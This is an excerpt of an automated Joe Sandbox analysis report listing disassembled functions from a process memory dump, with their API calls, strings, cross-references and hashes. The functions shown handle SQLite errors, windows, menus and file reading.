                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscpy$CloseCreateFileHandle
                                          • String ID: General
                                          • API String ID: 999786162-26480598
                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ErrorLastMessage_snwprintf
                                          • String ID: Error$Error %d: %s
                                          • API String ID: 313946961-1552265934
                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: foreign key constraint failed$new$oid$old
                                          • API String ID: 0-1953309616
                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                          • API String ID: 3510742995-272990098
                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: gj
                                          • API String ID: 1297977491-4203073231
                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                          • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                          Download Yara Rule
                                          APIs
                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                          • malloc.MSVCRT ref: 004174BD
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                          • String ID:
                                          • API String ID: 2903831945-0
                                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 0040D453
                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          • API String ID: 4247780290-0
                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                          • memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                          • String ID:
                                          • API String ID: 1471605966-0
                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          • wcscpy.MSVCRT ref: 0044475F
                                          • wcscat.MSVCRT ref: 0044476E
                                          • wcscat.MSVCRT ref: 0044477F
                                          • wcscat.MSVCRT ref: 0044478E
                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                          • String ID: \StringFileInfo\
                                          • API String ID: 102104167-2245444037
                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                          Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$??3@
                                          • String ID: g4@
                                          • API String ID: 3314356048-2133833424
                                          • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                          • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _memicmpwcslen
                                          • String ID: @@@@$History
                                          • API String ID: 1872909662-685208920
                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004100FB
                                          • memset.MSVCRT ref: 00410112
                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                          • _snwprintf.MSVCRT ref: 00410141
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                          • String ID: </%s>
                                          • API String ID: 3400436232-259020660
                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040D58D
                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ChildEnumTextWindowWindowsmemset
                                          • String ID: caption
                                          • API String ID: 1523050162-4135340389
                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                          • String ID: MS Sans Serif
                                          • API String ID: 210187428-168460110
                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                          Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClassName_wcsicmpmemset
                                          • String ID: edit
                                          • API String ID: 2747424523-2167791130
                                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                          Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                          • String ID: SHAutoComplete$shlwapi.dll
                                          • API String ID: 3150196962-1506664499
                                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp
                                          • String ID:
                                          • API String ID: 3384217055-0
                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                          Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                          • GetMenu.USER32(?), ref: 00410F8D
                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                          • String ID:
                                          • API String ID: 1889144086-0
                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                          Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                          • GetLastError.KERNEL32 ref: 0041810A
                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                          • String ID:
                                          • API String ID: 1661045500-0
                                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                          Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                          • memcpy.MSVCRT ref: 0042EC7A
                                          Strings
                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                          • API String ID: 1297977491-2063813899
                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040560C
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
